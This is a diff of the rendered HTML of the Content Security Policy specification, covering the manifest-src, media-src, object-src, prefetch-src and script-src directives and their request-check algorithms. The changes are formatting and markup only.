     <h4 class="heading settled" data-level="6.1.7" id="directive-manifest-src"><span class="secno">6.1.7. </span><span class="content"><code>manifest-src</code></span><a class="self-link" href="#directive-manifest-src"></a></h4>
-    <p>The <dfn class="dfn-paneled" data-dfn-type="dfn" data-export id="manifest-src">manifest-src</dfn> directive restricts the URLs from which application
+    <p>The <dfn class="dfn-paneled" data-dfn-type="dfn" data-export="" id="manifest-src">manifest-src</dfn> directive restricts the URLs from which application
   manifests may be loaded <a data-link-type="biblio" href="#biblio-appmanifest">[APPMANIFEST]</a>. The syntax for the directive’s name
   and value is described by the following ABNF:</p>
 <pre>directive-name  = "manifest-src"
 directive-value = <a data-link-type="grammar" href="#grammardef-serialized-source-list" id="ref-for-grammardef-serialized-source-list⑥">serialized-source-list</a>
 </pre>
-    <div class="example" id="example-b74797ac">
-     <a class="self-link" href="#example-b74797ac"></a> Given a page with the following Content Security Policy: 
+    <div class="example" id="example-71b38a27">
+     <a class="self-link" href="#example-71b38a27"></a> Given a page with the following Content Security Policy: 
 <pre><a data-link-type="http-header" href="#header-content-security-policy" id="ref-for-header-content-security-policy①②">Content-Security-Policy</a>: <a data-link-type="dfn" href="#manifest-src" id="ref-for-manifest-src②">manifest-src</a> https://example.com/
 </pre>
      <p>Fetches for the following code will return a network errors, as the URL
     provided do not match <code>manifest-src</code>'s <a data-link-type="dfn" href="#source-lists" id="ref-for-source-lists⑥">source list</a>:</p>
-<pre class="highlight"><c- p>&lt;</c-><c- f>link</c-> <c- e>rel</c-><c- o>=</c-><c- s>"manifest"</c-> <c- e>href</c-><c- o>=</c-><c- s>"https://example.org/manifest"</c-><c- p>></c->
+<pre class="highlight"><span class="p">&lt;</span><span class="nt">link</span> <span class="na">rel</span><span class="o">=</span><span class="s">"manifest"</span> <span class="na">href</span><span class="o">=</span><span class="s">"https://example.org/manifest"</span><span class="p">></span>
 </pre>
     </div>
     <h5 class="heading settled algorithm" data-algorithm="manifest-src Pre-request check" data-level="6.1.7.1" id="manifest-src-pre-request"><span class="secno">6.1.7.1. </span><span class="content"> <code>manifest-src</code> Pre-request check </span><a class="self-link" href="#manifest-src-pre-request"></a></h5>
     <p>This directive’s <a data-link-type="dfn" href="#directive-pre-request-check" id="ref-for-directive-pre-request-check⑨">pre-request check</a> is as follows:</p>
     <p>Given a <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request" id="ref-for-concept-request③④">request</a> (<var>request</var>) and a <a data-link-type="dfn" href="#content-security-policy-object" id="ref-for-content-security-policy-object④④">policy</a> (<var>policy</var>):</p>
     <ol>
-     <li data-md>
+     <li data-md="">
       <p>Let <var>name</var> be the result of executing <a href="#effective-directive-for-a-request">§6.7.1 Get the effective directive for request</a> on <var>request</var>.</p>
-     <li data-md>
+     <li data-md="">
       <p>If the result of executing <a href="#should-directive-execute">§6.7.4 Should fetch directive execute</a> on <var>name</var>, <code>manifest-src</code> and <var>policy</var> is "<code>No</code>", return "<code>Allowed</code>".</p>
-     <li data-md>
+     <li data-md="">
       <p>If the result of executing <a href="#match-request-to-source-list">§6.6.2.3 Does request match source list?</a> on <var>request</var>, this directive’s <a data-link-type="dfn" href="#directive-value" id="ref-for-directive-value②②">value</a>, and <var>policy</var>,
   is "<code>Does Not Match</code>", return "<code>Blocked</code>".</p>
-     <li data-md>
+     <li data-md="">
       <p>Return "<code>Allowed</code>".</p>
     </ol>
     <h5 class="heading settled algorithm" data-algorithm="manifest-src Post-request check" data-level="6.1.7.2" id="manifest-src-post-request"><span class="secno">6.1.7.2. </span><span class="content"> <code>manifest-src</code> Post-request check </span><a class="self-link" href="#manifest-src-post-request"></a></h5>
     <p>This directive’s <a data-link-type="dfn" href="#directive-post-request-check" id="ref-for-directive-post-request-check①⓪">post-request check</a> is as follows:</p>
     <p>Given a <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request" id="ref-for-concept-request③⑤">request</a> (<var>request</var>), a <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-response" id="ref-for-concept-response②④">response</a> (<var>response</var>), and a <a data-link-type="dfn" href="#content-security-policy-object" id="ref-for-content-security-policy-object④⑤">policy</a> (<var>policy</var>):</p>
     <ol>
-     <li data-md>
+     <li data-md="">
       <p>Let <var>name</var> be the result of executing <a href="#effective-directive-for-a-request">§6.7.1 Get the effective directive for request</a> on <var>request</var>.</p>
-     <li data-md>
+     <li data-md="">
       <p>If the result of executing <a href="#should-directive-execute">§6.7.4 Should fetch directive execute</a> on <var>name</var>, <code>manifest-src</code> and <var>policy</var> is "<code>No</code>", return "<code>Allowed</code>".</p>
-     <li data-md>
+     <li data-md="">
       <p>If the result of executing <a href="#match-response-to-source-list">§6.6.2.4 Does response to request match source list?</a> on <var>response</var>, <var>request</var>, this directive’s <a data-link-type="dfn" href="#directive-value" id="ref-for-directive-value②③">value</a>,
   and <var>policy</var>, is "<code>Does Not Match</code>", return "<code>Blocked</code>".</p>
-     <li data-md>
+     <li data-md="">
       <p>Return "<code>Allowed</code>".</p>
     </ol>
     <h4 class="heading settled" data-level="6.1.8" id="directive-media-src"><span class="secno">6.1.8. </span><span class="content"><code>media-src</code></span><a class="self-link" href="#directive-media-src"></a></h4>
-    <p>The <dfn class="dfn-paneled" data-dfn-type="dfn" data-export id="media-src">media-src</dfn> directive restricts the URLs from which video, audio,
+    <p>The <dfn class="dfn-paneled" data-dfn-type="dfn" data-export="" id="media-src">media-src</dfn> directive restricts the URLs from which video, audio,
   and associated text track resources may be loaded. The syntax for the
   directive’s name and value is described by the following ABNF:</p>
 <pre>directive-name  = "media-src"
 directive-value = <a data-link-type="grammar" href="#grammardef-serialized-source-list" id="ref-for-grammardef-serialized-source-list⑦">serialized-source-list</a>
 </pre>
-    <div class="example" id="example-98c9c614">
-     <a class="self-link" href="#example-98c9c614"></a> Given a page with the following Content Security Policy: 
+    <div class="example" id="example-ffa738ba">
+     <a class="self-link" href="#example-ffa738ba"></a> Given a page with the following Content Security Policy: 
 <pre><a data-link-type="http-header" href="#header-content-security-policy" id="ref-for-header-content-security-policy①③">Content-Security-Policy</a>: <a data-link-type="dfn" href="#media-src" id="ref-for-media-src②">media-src</a> https://example.com/
 </pre>
      <p>Fetches for the following code will return a network errors, as the URL
     provided do not match <code>media-src</code>'s <a data-link-type="dfn" href="#source-lists" id="ref-for-source-lists⑦">source list</a>:</p>
-<pre class="highlight"><c- p>&lt;</c-><c- f>audio</c-> <c- e>src</c-><c- o>=</c-><c- s>"https://example.org/audio"</c-><c- p>>&lt;/</c-><c- f>audio</c-><c- p>></c->
-<c- p>&lt;</c-><c- f>video</c-> <c- e>src</c-><c- o>=</c-><c- s>"https://example.org/video"</c-><c- p>></c->
-    <c- p>&lt;</c-><c- f>track</c-> <c- e>kind</c-><c- o>=</c-><c- s>"subtitles"</c-> <c- e>src</c-><c- o>=</c-><c- s>"https://example.org/subtitles"</c-><c- p>></c->
-<c- p>&lt;/</c-><c- f>video</c-><c- p>></c->
+<pre class="highlight"><span class="p">&lt;</span><span class="nt">audio</span> <span class="na">src</span><span class="o">=</span><span class="s">"https://example.org/audio"</span><span class="p">>&lt;/</span><span class="nt">audio</span><span class="p">></span>
+<span class="p">&lt;</span><span class="nt">video</span> <span class="na">src</span><span class="o">=</span><span class="s">"https://example.org/video"</span><span class="p">></span>
+    <span class="p">&lt;</span><span class="nt">track</span> <span class="na">kind</span><span class="o">=</span><span class="s">"subtitles"</span> <span class="na">src</span><span class="o">=</span><span class="s">"https://example.org/subtitles"</span><span class="p">></span>
+<span class="p">&lt;/</span><span class="nt">video</span><span class="p">></span>
 </pre>
     </div>
     <h5 class="heading settled algorithm" data-algorithm="media-src Pre-request check" data-level="6.1.8.1" id="media-src-pre-request"><span class="secno">6.1.8.1. </span><span class="content"> <code>media-src</code> Pre-request check </span><a class="self-link" href="#media-src-pre-request"></a></h5>
     <p>This directive’s <a data-link-type="dfn" href="#directive-pre-request-check" id="ref-for-directive-pre-request-check①⓪">pre-request check</a> is as follows:</p>
     <p>Given a <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request" id="ref-for-concept-request③⑥">request</a> (<var>request</var>) and a <a data-link-type="dfn" href="#content-security-policy-object" id="ref-for-content-security-policy-object④⑥">policy</a> (<var>policy</var>):</p>
     <ol>
-     <li data-md>
+     <li data-md="">
       <p>Let <var>name</var> be the result of executing <a href="#effective-directive-for-a-request">§6.7.1 Get the effective directive for request</a> on <var>request</var>.</p>
-     <li data-md>
+     <li data-md="">
       <p>If the result of executing <a href="#should-directive-execute">§6.7.4 Should fetch directive execute</a> on <var>name</var>, <code>media-src</code> and <var>policy</var> is "<code>No</code>", return "<code>Allowed</code>".</p>
-     <li data-md>
+     <li data-md="">
       <p>If the result of executing <a href="#match-request-to-source-list">§6.6.2.3 Does request match source list?</a> on <var>request</var>, this directive’s <a data-link-type="dfn" href="#directive-value" id="ref-for-directive-value②④">value</a>, and <var>policy</var>,
   is "<code>Does Not Match</code>", return "<code>Blocked</code>".</p>
-     <li data-md>
+     <li data-md="">
       <p>Return "<code>Allowed</code>".</p>
     </ol>
     <h5 class="heading settled algorithm" data-algorithm="media-src Post-request check" data-level="6.1.8.2" id="media-src-post-request"><span class="secno">6.1.8.2. </span><span class="content"> <code>media-src</code> Post-request check </span><a class="self-link" href="#media-src-post-request"></a></h5>
     <p>This directive’s <a data-link-type="dfn" href="#directive-post-request-check" id="ref-for-directive-post-request-check①①">post-request check</a> is as follows:</p>
     <p>Given a <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request" id="ref-for-concept-request③⑦">request</a> (<var>request</var>), a <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-response" id="ref-for-concept-response②⑤">response</a> (<var>response</var>), and a <a data-link-type="dfn" href="#content-security-policy-object" id="ref-for-content-security-policy-object④⑦">policy</a> (<var>policy</var>):</p>
     <ol>
-     <li data-md>
+     <li data-md="">
       <p>Let <var>name</var> be the result of executing <a href="#effective-directive-for-a-request">§6.7.1 Get the effective directive for request</a> on <var>request</var>.</p>
-     <li data-md>
+     <li data-md="">
       <p>If the result of executing <a href="#should-directive-execute">§6.7.4 Should fetch directive execute</a> on <var>name</var>, <code>media-src</code> and <var>policy</var> is "<code>No</code>", return "<code>Allowed</code>".</p>
-     <li data-md>
+     <li data-md="">
       <p>If the result of executing <a href="#match-response-to-source-list">§6.6.2.4 Does response to request match source list?</a> on <var>response</var>, <var>request</var>, this directive’s <a data-link-type="dfn" href="#directive-value" id="ref-for-directive-value②⑤">value</a>,
   and <var>policy</var>, is "<code>Does Not Match</code>", return "<code>Blocked</code>".</p>
-     <li data-md>
+     <li data-md="">
       <p>Return "<code>Allowed</code>".</p>
     </ol>
     <h4 class="heading settled" data-level="6.1.9" id="directive-object-src"><span class="secno">6.1.9. </span><span class="content"><code>object-src</code></span><a class="self-link" href="#directive-object-src"></a></h4>
-    <p>The <dfn class="dfn-paneled" data-dfn-type="dfn" data-export id="object-src">object-src</dfn> directive restricts the URLs from which plugin
+    <p>The <dfn class="dfn-paneled" data-dfn-type="dfn" data-export="" id="object-src">object-src</dfn> directive restricts the URLs from which plugin
   content may be loaded. The syntax for the directive’s name and value is
   described by the following ABNF:</p>
 <pre>directive-name  = "object-src"
 directive-value = <a data-link-type="grammar" href="#grammardef-serialized-source-list" id="ref-for-grammardef-serialized-source-list⑧">serialized-source-list</a>
 </pre>
-    <div class="example" id="example-e9e8c49e">
-     <a class="self-link" href="#example-e9e8c49e"></a> Given a page with the following Content Security Policy: 
+    <div class="example" id="example-fe2e097c">
+     <a class="self-link" href="#example-fe2e097c"></a> Given a page with the following Content Security Policy: 
 <pre><a data-link-type="http-header" href="#header-content-security-policy" id="ref-for-header-content-security-policy①④">Content-Security-Policy</a>: <a data-link-type="dfn" href="#object-src" id="ref-for-object-src③">object-src</a> https://example.com/
 </pre>
      <p>Fetches for the following code will return a network errors, as the URL
     provided do not match <code>object-src</code>'s <a data-link-type="dfn" href="#source-lists" id="ref-for-source-lists⑧">source list</a>:</p>
-<pre class="highlight"><c- p>&lt;</c-><c- f>embed</c-> <c- e>src</c-><c- o>=</c-><c- s>"https://example.org/flash"</c-><c- p>>&lt;/</c-><c- f>embed</c-><c- p>></c->
-<c- p>&lt;</c-><c- f>object</c-> <c- e>data</c-><c- o>=</c-><c- s>"https://example.org/flash"</c-><c- p>>&lt;/</c-><c- f>object</c-><c- p>></c->
-<c- p>&lt;</c-><c- f>applet</c-> <c- e>archive</c-><c- o>=</c-><c- s>"https://example.org/flash"</c-><c- p>>&lt;/</c-><c- f>applet</c-><c- p>></c->
+<pre class="highlight"><span class="p">&lt;</span><span class="nt">embed</span> <span class="na">src</span><span class="o">=</span><span class="s">"https://example.org/flash"</span><span class="p">>&lt;/</span><span class="nt">embed</span><span class="p">></span>
+<span class="p">&lt;</span><span class="nt">object</span> <span class="na">data</span><span class="o">=</span><span class="s">"https://example.org/flash"</span><span class="p">>&lt;/</span><span class="nt">object</span><span class="p">></span>
+<span class="p">&lt;</span><span class="nt">applet</span> <span class="na">archive</span><span class="o">=</span><span class="s">"https://example.org/flash"</span><span class="p">>&lt;/</span><span class="nt">applet</span><span class="p">></span>
 </pre>
     </div>
     <p>If plugin content is loaded without an associated URL (perhaps an <code><a data-link-type="element" href="https://html.spec.whatwg.org/multipage/iframe-embed-object.html#the-object-element" id="ref-for-the-object-element①">object</a></code> element lacks a <code><a data-link-type="element-sub" href="https://html.spec.whatwg.org/multipage/iframe-embed-object.html#attr-object-data" id="ref-for-attr-object-data">data</a></code> attribute, but loads some default plugin based
@@ -3732,124 +3740,124 @@ directive-value = <a data-link-type="grammar" href="#grammardef-serialized-sourc
     <p>This directive’s <a data-link-type="dfn" href="#directive-pre-request-check" id="ref-for-directive-pre-request-check①①">pre-request check</a> is as follows:</p>
     <p>Given a <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request" id="ref-for-concept-request③⑧">request</a> (<var>request</var>) and a <a data-link-type="dfn" href="#content-security-policy-object" id="ref-for-content-security-policy-object④⑨">policy</a> (<var>policy</var>):</p>
     <ol>
-     <li data-md>
+     <li data-md="">
       <p>Let <var>name</var> be the result of executing <a href="#effective-directive-for-a-request">§6.7.1 Get the effective directive for request</a> on <var>request</var>.</p>
-     <li data-md>
+     <li data-md="">
       <p>If the result of executing <a href="#should-directive-execute">§6.7.4 Should fetch directive execute</a> on <var>name</var>, <code>object-src</code> and <var>policy</var> is "<code>No</code>", return "<code>Allowed</code>".</p>
-     <li data-md>
+     <li data-md="">
       <p>If the result of executing <a href="#match-request-to-source-list">§6.6.2.3 Does request match source list?</a> on <var>request</var>, this directive’s <a data-link-type="dfn" href="#directive-value" id="ref-for-directive-value②⑥">value</a>, and <var>policy</var>,
   is "<code>Does Not Match</code>", return "<code>Blocked</code>".</p>
-     <li data-md>
+     <li data-md="">
       <p>Return "<code>Allowed</code>".</p>
     </ol>
     <h5 class="heading settled algorithm" data-algorithm="object-src Post-request check" data-level="6.1.9.2" id="object-src-post-request"><span class="secno">6.1.9.2. </span><span class="content"> <code>object-src</code> Post-request check </span><a class="self-link" href="#object-src-post-request"></a></h5>
     <p>This directive’s <a data-link-type="dfn" href="#directive-post-request-check" id="ref-for-directive-post-request-check①②">post-request check</a> is as follows:</p>
     <p>Given a <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request" id="ref-for-concept-request③⑨">request</a> (<var>request</var>), a <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-response" id="ref-for-concept-response②⑥">response</a> (<var>response</var>), and a <a data-link-type="dfn" href="#content-security-policy-object" id="ref-for-content-security-policy-object⑤⓪">policy</a> (<var>policy</var>):</p>
     <ol>
-     <li data-md>
+     <li data-md="">
       <p>Let <var>name</var> be the result of executing <a href="#effective-directive-for-a-request">§6.7.1 Get the effective directive for request</a> on <var>request</var>.</p>
-     <li data-md>
+     <li data-md="">
       <p>If the result of executing <a href="#should-directive-execute">§6.7.4 Should fetch directive execute</a> on <var>name</var>, <code>object-src</code> and <var>policy</var> is "<code>No</code>", return "<code>Allowed</code>".</p>
-     <li data-md>
+     <li data-md="">
       <p>If the result of executing <a href="#match-response-to-source-list">§6.6.2.4 Does response to request match source list?</a> on <var>response</var>, <var>request</var>, this directive’s <a data-link-type="dfn" href="#directive-value" id="ref-for-directive-value②⑦">value</a>,
   and <var>policy</var>, is "<code>Does Not Match</code>", return "<code>Blocked</code>".</p>
-     <li data-md>
+     <li data-md="">
       <p>Return "<code>Allowed</code>".</p>
     </ol>
     <h4 class="heading settled" data-level="6.1.10" id="directive-prefetch-src"><span class="secno">6.1.10. </span><span class="content"><code>prefetch-src</code></span><a class="self-link" href="#directive-prefetch-src"></a></h4>
-    <p>The <dfn class="dfn-paneled" data-dfn-type="dfn" data-export id="prefetch-src">prefetch-src</dfn> directive restricts the URLs from which resources may be
+    <p>The <dfn class="dfn-paneled" data-dfn-type="dfn" data-export="" id="prefetch-src">prefetch-src</dfn> directive restricts the URLs from which resources may be
   prefetched or prerendered. The syntax for the directive’s name and value is described by the
   following ABNF:</p>
 <pre>directive-name  = "prefetch-src"
 directive-value = <a data-link-type="grammar" href="#grammardef-serialized-source-list" id="ref-for-grammardef-serialized-source-list⑨">serialized-source-list</a>
 </pre>
-    <div class="example" id="example-f7e7e15d">
-     <a class="self-link" href="#example-f7e7e15d"></a> Given a page with the following Content Security Policy: 
+    <div class="example" id="example-c8d32d63">
+     <a class="self-link" href="#example-c8d32d63"></a> Given a page with the following Content Security Policy: 
 <pre><a data-link-type="http-header" href="#header-content-security-policy" id="ref-for-header-content-security-policy①⑤">Content-Security-Policy</a>: <a data-link-type="dfn" href="#prefetch-src" id="ref-for-prefetch-src②">prefetch-src</a> https://example.com/
 </pre>
      <p>Fetches for the following code will return network errors, as the URLs provided do not match <code>prefetch-src</code>'s <a data-link-type="dfn" href="#source-lists" id="ref-for-source-lists⑨">source list</a>:</p>
-<pre class="highlight"><c- p>&lt;</c-><c- f>link</c-> <c- e>rel</c-><c- o>=</c-><c- s>"prefetch"</c-> <c- e>src</c-><c- o>=</c-><c- s>"https://example.org/"</c-><c- p>>&lt;/</c-><c- f>link</c-><c- p>></c->
-<c- p>&lt;</c-><c- f>link</c-> <c- e>rel</c-><c- o>=</c-><c- s>"prerender"</c-> <c- e>src</c-><c- o>=</c-><c- s>"https://example.org/"</c-><c- p>>&lt;/</c-><c- f>link</c-><c- p>></c->
+<pre class="highlight"><span class="p">&lt;</span><span class="nt">link</span> <span class="na">rel</span><span class="o">=</span><span class="s">"prefetch"</span> <span class="na">src</span><span class="o">=</span><span class="s">"https://example.org/"</span><span class="p">>&lt;/</span><span class="nt">link</span><span class="p">></span>
+<span class="p">&lt;</span><span class="nt">link</span> <span class="na">rel</span><span class="o">=</span><span class="s">"prerender"</span> <span class="na">src</span><span class="o">=</span><span class="s">"https://example.org/"</span><span class="p">>&lt;/</span><span class="nt">link</span><span class="p">></span>
 </pre>
     </div>
     <h5 class="heading settled algorithm" data-algorithm="prefetch-src Pre-request check" data-level="6.1.10.1" id="prefetch-src-pre-request"><span class="secno">6.1.10.1. </span><span class="content"> <code>prefetch-src</code> Pre-request check </span><a class="self-link" href="#prefetch-src-pre-request"></a></h5>
     <p>This directive’s <a data-link-type="dfn" href="#directive-pre-request-check" id="ref-for-directive-pre-request-check①②">pre-request check</a> is as follows:</p>
     <p>Given a <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request" id="ref-for-concept-request④⓪">request</a> (<var>request</var>) and a <a data-link-type="dfn" href="#content-security-policy-object" id="ref-for-content-security-policy-object⑤①">policy</a> (<var>policy</var>):</p>
     <ol>
-     <li data-md>
+     <li data-md="">
       <p>Let <var>name</var> be the result of executing <a href="#effective-directive-for-a-request">§6.7.1 Get the effective directive for request</a> on <var>request</var>.</p>
-     <li data-md>
+     <li data-md="">
       <p>If the result of executing <a href="#should-directive-execute">§6.7.4 Should fetch directive execute</a> on <var>name</var>, <code>prefetch-src</code> and <var>policy</var> is "<code>No</code>", return "<code>Allowed</code>".</p>
-     <li data-md>
+     <li data-md="">
       <p>If the result of executing <a href="#match-request-to-source-list">§6.6.2.3 Does request match source list?</a> on <var>request</var>,
   this directive’s <a data-link-type="dfn" href="#directive-value" id="ref-for-directive-value②⑧">value</a>, and <var>policy</var>,
   is "<code>Does Not Match</code>", return "<code>Blocked</code>".</p>
-     <li data-md>
+     <li data-md="">
       <p>Return "<code>Allowed</code>".</p>
     </ol>
     <h5 class="heading settled algorithm" data-algorithm="prefetch-src Post-request check" data-level="6.1.10.2" id="prefetch-src-post-request"><span class="secno">6.1.10.2. </span><span class="content"> <code>prefetch-src</code> Post-request check </span><a class="self-link" href="#prefetch-src-post-request"></a></h5>
     <p>This directive’s <a data-link-type="dfn" href="#directive-post-request-check" id="ref-for-directive-post-request-check①③">post-request check</a> is as follows:</p>
     <p>Given a <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request" id="ref-for-concept-request④①">request</a> (<var>request</var>), a <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-response" id="ref-for-concept-response②⑦">response</a> (<var>response</var>), and a <a data-link-type="dfn" href="#content-security-policy-object" id="ref-for-content-security-policy-object⑤②">policy</a> (<var>policy</var>):</p>
     <ol>
-     <li data-md>
+     <li data-md="">
       <p>Let <var>name</var> be the result of executing <a href="#effective-directive-for-a-request">§6.7.1 Get the effective directive for request</a> on <var>request</var>.</p>
-     <li data-md>
+     <li data-md="">
       <p>If the result of executing <a href="#should-directive-execute">§6.7.4 Should fetch directive execute</a> on <var>name</var>, <code>prefetch-src</code> and <var>policy</var> is "<code>No</code>", return "<code>Allowed</code>".</p>
-     <li data-md>
+     <li data-md="">
       <p>If the result of executing <a href="#match-response-to-source-list">§6.6.2.4 Does response to request match source list?</a> on <var>response</var>, <var>request</var>, this directive’s <a data-link-type="dfn" href="#directive-value" id="ref-for-directive-value②⑨">value</a>, and <var>policy</var>,
   is "<code>Does Not Match</code>", return "<code>Blocked</code>".</p>
-     <li data-md>
+     <li data-md="">
       <p>Return "<code>Allowed</code>".</p>
     </ol>
     <h4 class="heading settled" data-level="6.1.11" id="directive-script-src"><span class="secno">6.1.11. </span><span class="content"><code>script-src</code></span><a class="self-link" href="#directive-script-src"></a></h4>
-    <p>The <dfn class="dfn-paneled" data-dfn-type="dfn" data-export id="script-src">script-src</dfn> directive restricts the locations from which scripts
+    <p>The <dfn class="dfn-paneled" data-dfn-type="dfn" data-export="" id="script-src">script-src</dfn> directive restricts the locations from which scripts
   may be executed. This includes not only URLs loaded directly into <code><a data-link-type="element" href="https://html.spec.whatwg.org/multipage/scripting.html#script" id="ref-for-script③">script</a></code> elements, but also things like inline script blocks and XSLT stylesheets <a data-link-type="biblio" href="#biblio-xslt">[XSLT]</a> which can trigger script execution. The syntax for the directive’s
   name and value is described by the following ABNF:</p>
-    <p>The <code>script-src</code> directive acts as a default fallback for all <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#request-destination-script-like" id="ref-for-request-destination-script-like">script-like</a> destinations (including worker-specific destinations if <a data-link-type="dfn" href="#worker-src" id="ref-for-worker-src②"><code>worker-src</code></a> is not present). Unless granularity is desired <code>script-src</code> should
-  be used in favor of <a data-link-type="dfn" href="#script-src-attr" id="ref-for-script-src-attr②"><code>script-src-attr</code></a> and <a data-link-type="dfn" href="#script-src-elem" id="ref-for-script-src-elem③"><code>script-src-elem</code></a> as in most situations there is no particular reason to have separate lists of
-  permissions for inline event handlers and <code><a data-link-type="element" href="https://html.spec.whatwg.org/multipage/scripting.html#script" id="ref-for-script④">script</a></code> elements.</p>
 <pre>directive-name  = "script-src"
 directive-value = <a data-link-type="grammar" href="#grammardef-serialized-source-list" id="ref-for-grammardef-serialized-source-list①⓪">serialized-source-list</a>
 </pre>
+    <p>The <code>script-src</code> directive acts as a default fallback for all <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#request-destination-script-like" id="ref-for-request-destination-script-like">script-like</a> destinations (including worker-specific destinations if <a data-link-type="dfn" href="#worker-src" id="ref-for-worker-src②"><code>worker-src</code></a> is not present). Unless granularity is desired <code>script-src</code> should
+  be used in favor of <a data-link-type="dfn" href="#script-src-attr" id="ref-for-script-src-attr②"><code>script-src-attr</code></a> and <a data-link-type="dfn" href="#script-src-elem" id="ref-for-script-src-elem③"><code>script-src-elem</code></a> as in most situations there is no particular reason to have separate lists of
+  permissions for inline event handlers and <code><a data-link-type="element" href="https://html.spec.whatwg.org/multipage/scripting.html#script" id="ref-for-script④">script</a></code> elements.</p>
     <p>The <code>script-src</code> directive governs five things:</p>
     <ol>
-     <li data-md>
+     <li data-md="">
       <p>Script <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request" id="ref-for-concept-request④②">requests</a> MUST pass through <a href="#should-block-request">§4.1.3 Should request be blocked by Content Security Policy?</a>.</p>
-     <li data-md>
+     <li data-md="">
       <p>Script <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-response" id="ref-for-concept-response②⑧">responses</a> MUST pass through <a href="#should-block-response">§4.1.4 Should response to request be blocked by Content Security Policy?</a>.</p>
-     <li data-md>
+     <li data-md="">
       <p>Inline <code><a data-link-type="element" href="https://html.spec.whatwg.org/multipage/scripting.html#script" id="ref-for-script⑤">script</a></code> blocks MUST pass through <a href="#should-block-inline">§4.2.4 Should element’s inline type behavior be blocked by Content Security Policy?</a>. Their
   behavior will be blocked unless every policy allows inline script, either
   implicitly by not specifying a <code>script-src</code> (or <code>default-src</code>) directive,
   or explicitly, by specifying "<code>unsafe-inline</code>", a <a data-link-type="grammar" href="#grammardef-nonce-source" id="ref-for-grammardef-nonce-source②">nonce-source</a> or a <a data-link-type="grammar" href="#grammardef-hash-source" id="ref-for-grammardef-hash-source②">hash-source</a> that matches
   the inline block.</p>
-     <li data-md>
+     <li data-md="">
       <p>The following JavaScript execution sinks are gated on the "<code>unsafe-eval</code>"
   source expression:</p>
       <ul>
-       <li data-md>
+       <li data-md="">
         <p><code class="idl"><a data-link-type="idl" href="https://tc39.github.io/ecma262#sec-eval-x" id="ref-for-sec-eval-x①">eval()</a></code></p>
-       <li data-md>
+       <li data-md="">
         <p><code class="idl"><a data-link-type="idl" href="https://tc39.github.io/ecma262#sec-function-objects" id="ref-for-sec-function-objects">Function()</a></code></p>
-       <li data-md>
+       <li data-md="">
         <p><code class="idl"><a data-link-type="idl" href="https://html.spec.whatwg.org/multipage/timers-and-user-prompts.html#dom-settimeout" id="ref-for-dom-settimeout">setTimeout()</a></code> with an initial argument which is not callable.</p>
-       <li data-md>
+       <li data-md="">
         <p><code class="idl"><a data-link-type="idl" href="https://html.spec.whatwg.org/multipage/timers-and-user-prompts.html#dom-setinterval" id="ref-for-dom-setinterval">setInterval()</a></code> with an initial argument which is not callable.</p>
       </ul>
       <p class="note" role="note"><span>Note:</span> If a user agent implements non-standard sinks like <code>setImmediate()</code> or <code>execScript()</code>, they SHOULD also be gated on "<code>unsafe-eval</code>".
   Note: Since "<code>unsafe-eval</code>" acts as a global page flag, <a data-link-type="dfn" href="#script-src-attr" id="ref-for-script-src-attr③"><code>script-src-attr</code></a> and <a data-link-type="dfn" href="#script-src-elem" id="ref-for-script-src-elem④"><code>script-src-elem</code></a> are not used when performing this check, instead <code>script-src</code> (or it’s fallback directive) is always used.</p>
-     <li data-md>
+     <li data-md="">
       <p>Navigation to <code>javascript:</code> URLs MUST pass through <a href="#script-src-inline">§6.1.11.3 script-src Inline Check</a>.</p>
     </ol>
     <h5 class="heading settled algorithm" data-algorithm="script-src Pre-request check" data-level="6.1.11.1" id="script-src-pre-request"><span class="secno">6.1.11.1. </span><span class="content"> <code>script-src</code> Pre-request check </span><a class="self-link" href="#script-src-pre-request"></a></h5>
     <p>This directive’s <a data-link-type="dfn" href="#directive-pre-request-check" id="ref-for-directive-pre-request-check①③">pre-request check</a> is as follows:</p>
     <p>Given a <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request" id="ref-for-concept-request④③">request</a> (<var>request</var>) and a <a data-link-type="dfn" href="#content-security-policy-object" id="ref-for-content-security-policy-object⑤③">policy</a> (<var>policy</var>):</p>
     <ol>
-     <li data-md>
+     <li data-md="">
       <p>Let <var>name</var> be the result of executing <a href="#effective-directive-for-a-request">§6.7.1 Get the effective directive for request</a> on <var>request</var>.</p>
-     <li data-md>
+     <li data-md="">
       <p>If the result of executing <a href="#should-directive-execute">§6.7.4 Should fetch directive execute</a> on <var>name</var>, <code>script-src</code> and <var>policy</var> is "<code>No</code>", return "<code>Allowed</code>".</p>
-     <li data-md>
+     <li data-md="">
       <p>Return the result of executing <a href="#script-pre-request">§6.6.1.1 Script directives pre-request check</a> on <var>request</var>,
   this directive, and <var>policy</var>.</p>
     </ol>
@@ -3857,27 +3865,27 @@ directive-value = <a data-link-type="grammar" href="#grammardef-serialized-sourc
     <p>This directive’s <a data-link-type="dfn" href="#directive-post-request-check" id="ref-for-directive-post-request-check①④">post-request check</a> is as follows:</p>
     <p>Given a <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request" id="ref-for-concept-request④④">request</a> (<var>request</var>), a <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-response" id="ref-for-concept-response②⑨">response</a> (<var>response</var>), and a <a data-link-type="dfn" href="#content-security-policy-object" id="ref-for-content-security-policy-object⑤④">policy</a> (<var>policy</var>):</p>
     <ol>
-     <li data-md>
+     <li data-md="">
       <p>Let <var>name</var> be the result of executing <a href="#effective-directive-for-a-request">§6.7.1 Get the effective directive for request</a> on <var>request</var>.</p>
-     <li data-md>
+     <li data-md="">
